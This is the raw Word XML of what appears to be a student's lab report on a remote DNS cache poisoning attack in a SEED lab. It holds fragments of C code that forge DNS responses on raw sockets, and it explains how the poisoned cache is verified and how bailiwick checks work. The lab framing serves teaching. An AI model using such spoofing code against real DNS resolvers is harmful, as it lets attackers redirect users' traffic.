    <w:p w14:paraId="523BDE00" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC0914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udp-&gt;udph_len = htons(sizeof(struct udpheader)+sizeof(struct dnsheader)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F92EEA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+length+sizeof(struct dataEnd)); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DA083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udp_header_size + udp_payload_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0179B20C" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B0333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Calculate the checksum for integrity//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A92F3E" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0386570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ip-&gt;iph_chksum = csum((unsigned short *)buffer, sizeof(struct ipheader) + sizeof(struct udpheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C535C7" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FAD00C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udp-&gt;udph_chksum=check_udp_sum(buffer, packetLength-sizeof(struct ipheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B032124" w14:textId="781BF9D0"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r w:rsidR="008A0CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>*****************************</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021B35E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Tips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F08263" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC70022"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the checksum is quite important to pass the checking integrity. You need </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D05FA" w14:textId="1B56D7B1"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to study the </w:t>
      </w:r>
      <w:r w:rsidR="00CE029F" w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and what part should be taken into the calculation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BAF168" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53CBF55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!!!!!If you change anything related to the calculation of the checksum, you need to re-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52905DF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calculate it or the packet will be dropped.!!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07722953" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A7FF0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Here things became easier since I wrote the checksum function for you. You don't need</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EFEAB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to spend your time writing the right checksum function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630C3E4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Just for knowledge purpose,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BE14CA" w14:textId="444CF0F3"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remember the </w:t>
      </w:r>
      <w:r w:rsidR="00233FB3" w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>second</w:t>
      </w:r>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023071E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for UDP checksum:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178EBA0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ipheader_size + udpheader_size + udpData_size  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59839C3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for IP checksum: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290C327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ipheader_size + udpheader_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F89BDA" w14:textId="439A1A01"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r w:rsidR="008A0CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037FE2E0" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C2F555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Inform the kernel do not fill up the packet structure. we will build our own...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE9934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if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, val, sizeof(one))&lt;0 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C46FEE"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68069C1B"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printf("error\n");</w:t>
      </w:r>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="609F9CD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exit(-1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664FC2B5"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1CED9038" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60C26E7D"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while(1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E158974"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This is to generate different query in xxxxx.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B46EB0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int charnumber;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB334C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charnumber=1+rand()%5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FB6EFC"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*(data+charnumber)+=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DD8D1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recalculate the checksum for the UDP packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257A9981"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 xml:space="preserve">udp-&gt;udph_chksum=check_udp_sum(buffer, packetLength-sizeof(struct ipheader)); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5F9DC9"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t>// send the packet out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E35238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r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>if(sendto(sd, buffer, packetLength, 0, (struct sockaddr *)&amp;sin, sizeof(sin)) &lt; 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679FCC86"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ab/>
      </w:r>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>printf("packet send error %d which means %s\n",errno,strerror(errno));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7876278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Sleep for 1 second before sending the response */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D6CFF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sleep(0.5); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F41410"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 Here data is the url which needs to be resolved,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB2768A"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argv[2] is the destination address and argv[1] is the source address */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757A65F8"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printf("Before calling send_dns_response\n"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A6D320" w14:textId="1800FCFD"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send_dns_</w:t>
      </w:r>
      <w:r w:rsidR="00935BD6" w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>response (</w:t>
      </w:r>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">data, argv[1], argv[2]); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FE728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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C8147"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close(sd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387871A3" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRP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 xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAC42F7" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AC17E1" w14:textId="77777777" w:rsidR="00871E60" w:rsidRDefault="00871E60" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="621CE83B" w14:textId="0695E68D" w:rsidR="00871E60" w:rsidRDefault="00431930" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Now the attacker tries to pump DNS queries followed by DNS spoofed responses. We will demonstrate the attack being successful by showing the poisoned cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF3706D" w14:textId="77777777" w:rsidR="00770264" w:rsidRDefault="00770264" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C2CE880" w14:textId="11E06DB7" w:rsidR="00770264" w:rsidRDefault="00770264" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The attacker keeps on trying the DNS requests and DNS spoofed responses with all the possible transaction IDs for each random domain name( xxxxx.example.edu , initially it is aaaaa.example.edu and one of character is incremented by 1 randomly every time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAD37E1" w14:textId="77777777" w:rsidR="0045782D" w:rsidRDefault="00770264" w:rsidP="002C29DB">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6EA4A21" wp14:editId="4F321243">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SEED-UBUNTU Clone_21_03_2018_12_17_46.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029879" w14:textId="23459053" w:rsidR="008C6833" w:rsidRDefault="00584308" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">In the figure below we continuously check for the string </w:t>
      </w:r>
      <w:r w:rsidR="002A0974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>dnslabattacker</w:t>
      </w:r>
      <w:r w:rsidR="002A0974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the file “/var/cache/bind/dump.db”  </w:t>
      </w:r>
      <w:r w:rsidR="002A0974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. When it is present, in current lab the attack was successful within few seconds. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DDB8A7" w14:textId="479F459C" w:rsidR="00770264" w:rsidRDefault="00770264" w:rsidP="002C29DB">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43E455E" wp14:editId="28EA5C89">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SEED-UBUNTU_21_03_2018_12_17_2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4C6F25C" w14:textId="77777777" w:rsidR="002A0974" w:rsidRDefault="002A0974" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F4C6399" w14:textId="6048F245" w:rsidR="002A0974" w:rsidRDefault="002A0974" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Proof of successful attack inside the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1095DCEC" w14:textId="6735D63C" w:rsidR="002A0974" w:rsidRDefault="002A0974" w:rsidP="002C29DB">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768A00E" wp14:editId="7D994559">
            <wp:extent cx="5943600" cy="3418661"/>
            <wp:effectExtent l="0" t="0" r="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SEED-UBUNTU_21_03_2018_12_18_33.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5952522" cy="3423793"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BA2BB6" w14:textId="77777777" w:rsidR="005B6F7B" w:rsidRDefault="005B6F7B" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75FBE037" w14:textId="77777777" w:rsidR="005B6F7B" w:rsidRDefault="005B6F7B" w:rsidP="005B6F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B6F7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3.2 Task 2: Result Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD591BE" w14:textId="3F19EF20" w:rsidR="005B6F7B" w:rsidRDefault="007437BF" w:rsidP="005B6F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">To make sure the attack is successful, we run the dig command on the user machine to ask for </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00E401D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>www.example.com’s</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP address. </w:t>
      </w:r>
      <w:r w:rsidR="006F07C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> When Apollo receives the DNS query, it </w:t>
      </w:r>
      <w:r w:rsidR="00D1727E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>searches for example.com’s NS record in cache, and finds ns.dnslabattacker.net. It will therefore send a DNS query to ns.dnslabattacker.net. But this name doesn’t exist in reality, and we created it fo</w:t>
      </w:r>
      <w:r w:rsidR="000D393B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">r demonstration purpose only. Apollo will soon find out this and mark our entry is invalid, essentially recovering from DNS cache poisoning. </w:t>
      </w:r>
      <w:r w:rsidR="002231B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>We can argue that while spo</w:t>
      </w:r>
      <w:r w:rsidR="00675CC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ofing DNS reply, we can provide the IP address of ns.dnslabattacker.net in the additional section information. Unfortunately, this additional record won’t be accepted by Apollo DNS server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F78580" w14:textId="77777777" w:rsidR="00675CC6" w:rsidRDefault="00675CC6" w:rsidP="005B6F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C96867" w14:textId="3A280C14" w:rsidR="00675CC6" w:rsidRDefault="00872C51" w:rsidP="005B6F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The criteria for accepting/discarding authority section is checking whether the result is subdomain of the </w:t>
      </w:r>
      <w:r w:rsidR="003C460D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">domain we are querying., here we might query root server to get .com domain, we will query .com Server to get example.com domain </w:t>
      </w:r>
      <w:r w:rsidR="00020C66">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>etc.</w:t>
      </w:r>
      <w:r w:rsidR="003C460D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the authority section answer contains domain which is not within the subdomain of the queried domain, it will be discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0335F1C6" w14:textId="77777777" w:rsidR="003C460D" w:rsidRDefault="003C460D" w:rsidP="005B6F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D64345B" w14:textId="77777777" w:rsidR="00020C66" w:rsidRDefault="00165D4A" w:rsidP="005B6F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">So in our case example.com which is subdomain of .com server will be accepted. The nameserver can be out of zone, i.e., we can let ns.dnslabattacker.net be the name server for example.com. Hence this authoritative section will be accepted. </w:t>
      </w:r>
      <w:r w:rsidR="00B24DD4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>But the answer record checks that ns.dnalabattacker.net is out of zone for .com Server, and hence will be discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1C0B2A" w14:textId="77777777" w:rsidR="00020C66" w:rsidRDefault="00020C66" w:rsidP="005B6F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3366486F" w14:textId="32EACF94" w:rsidR="00165D4A" w:rsidRDefault="00C2554B" w:rsidP="005B6F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>We can solve this problem either by buying a domain name for dnslabattacker.net (in GoDaddy or AWS services</w:t>
      </w:r>
      <w:r w:rsidR="002833AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidR="003105D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that it can answer queries for DNS. In our demonstration, we will use second approach</w:t>
      </w:r>
      <w:r w:rsidR="00AA2AA4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, i.e., we add some configuration on Apollo Server, so that it recognizes dnslabattacker.net as a real domain. </w:t>
      </w:r>
      <w:r w:rsidR="00262E08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We basically add the ns.dnslabattacker.net’s IP address </w:t>
      </w:r>
      <w:r w:rsidR="002F7AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>to Apollo’</w:t>
      </w:r>
      <w:r w:rsidR="00D4185F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">s DNS configuration, so that Apollo </w:t>
      </w:r>
      <w:r w:rsidR="00614D33">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>doesn’t need</w:t>
      </w:r>
      <w:r w:rsidR="00D4185F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to go out </w:t>
      </w:r>
      <w:r w:rsidR="00AB1B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">asking for IP address. </w:t>
      </w:r>
      <w:r w:rsidR="00614D33">
        <w:rPr>
